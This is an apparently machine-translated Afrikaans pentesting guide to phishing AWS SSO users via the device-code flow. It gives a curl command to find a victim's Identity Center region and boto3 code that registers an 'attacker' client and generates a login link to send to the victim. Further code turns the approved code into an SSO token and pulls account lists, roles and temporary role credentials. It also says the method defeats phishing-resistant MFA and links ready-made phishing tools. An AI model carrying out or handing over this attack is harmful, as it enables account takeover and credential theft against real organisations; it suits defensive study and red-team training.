AWS - Identity Center & SSO Unauthenticated Enum

AWS Toestelkode Phishing

Aanvanklik voorgestel in hierdie blogpos, dit is moontlik om 'n skakel na 'n gebruiker te stuur wat AWS SSO gebruik, wat, as die gebruiker aanvaar, die aanvaller in staat sal stel om 'n token te verklee as die gebruiker en toegang te verkry tot al die rolle wat die gebruiker kan toegang hê in die Identiteitsentrum.

Om hierdie aanval uit te voer, is die vereistes:

• Die slagoffer moet Identiteitsentrum gebruik

• Die aanvaller moet die subdomein ken wat deur die slagoffer gebruik word <victimsub>.awsapps.com/start

Net met die vorige inligting, sal die aanvaller in staat wees om 'n skakel na die gebruiker te stuur wat, as dit aangeneem word, die aanvaller toegang tot die AWS gebruiker rekening sal gee.

Aanval

1. Vind die subdomein

Die eerste stap van die aanvaller is om uit te vind watter subdomein die slagoffer maatskappy in hul Identiteitsentrum gebruik. Dit kan gedoen word deur OSINT of raai + BF aangesien die meeste maatskappye hul naam of 'n variasie van hul naam hier sal gebruik.

Met hierdie inligting is dit moontlik om die streek te kry waar die Identiteitsentrum geconfigureer is met:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1

1. Genereer die skakel vir die slagoffer & Stuur dit

Voer die volgende kode uit om 'n AWS SSO aanmeldskakel te genereer sodat die slagoffer kan autentiseer. Vir die demo, voer hierdie kode in 'n python-konsol uit en verlaat dit nie, aangesien jy later 'n paar voorwerpe nodig sal hê om die token te verkry:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Stuur die gegenereerde skakel na die slagoffer met jou wonderlike sosiale ingenieursvaardighede!

1. Wag totdat die slagoffer dit aanvaar

As die slagoffer reeds in AWS ingelog was, sal hy net die toestemmings moet aanvaar, as hy nie was nie, sal hy moet inlog en dan die toestemmings aanvaar. So lyk die prompt vandag:

1. Kry SSO-toegangstoken

As die slagoffer die prompt aanvaar het, voer hierdie kode uit om 'n SSO-token te genereer wat die gebruiker naboots:

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

Die SSO toegangstoken is geldigheid vir 8h.

1. Verpersoonlik die gebruiker

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing die onphishbare MFA

Dit is lekker om te weet dat die vorige aanval werk selfs al word 'n "onphishbare MFA" (webAuth) gebruik. Dit is omdat die vorige werksaamheid nooit die gebruikte OAuth-domein verlaat nie. Nie soos in ander phishing-aanvalle waar die gebruiker die aanmeld-domein moet vervang nie, in die geval is die toestelkode-werksaamheid voorberei sodat 'n kode bekend is aan 'n toestel en die gebruiker kan aanmeld selfs op 'n ander masjien. As die prompt aanvaar word, kan die toestel, net deur die aanvanklike kode te ken, akkrediteer vir die gebruiker.

Vir meer inligting oor hierdie kyk hierdie pos.

Outomatiese Gereedskap

• https://github.com/christophetd/aws-sso-device-code-authentication

• https://github.com/sebastian-mora/awsssome_phish

Verwysings

• https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/

• https://ruse.tech/blogs/aws-sso-phishing

• https://mjg59.dreamwidth.org/62175.html

• https://ramimac.me/aws-device-auth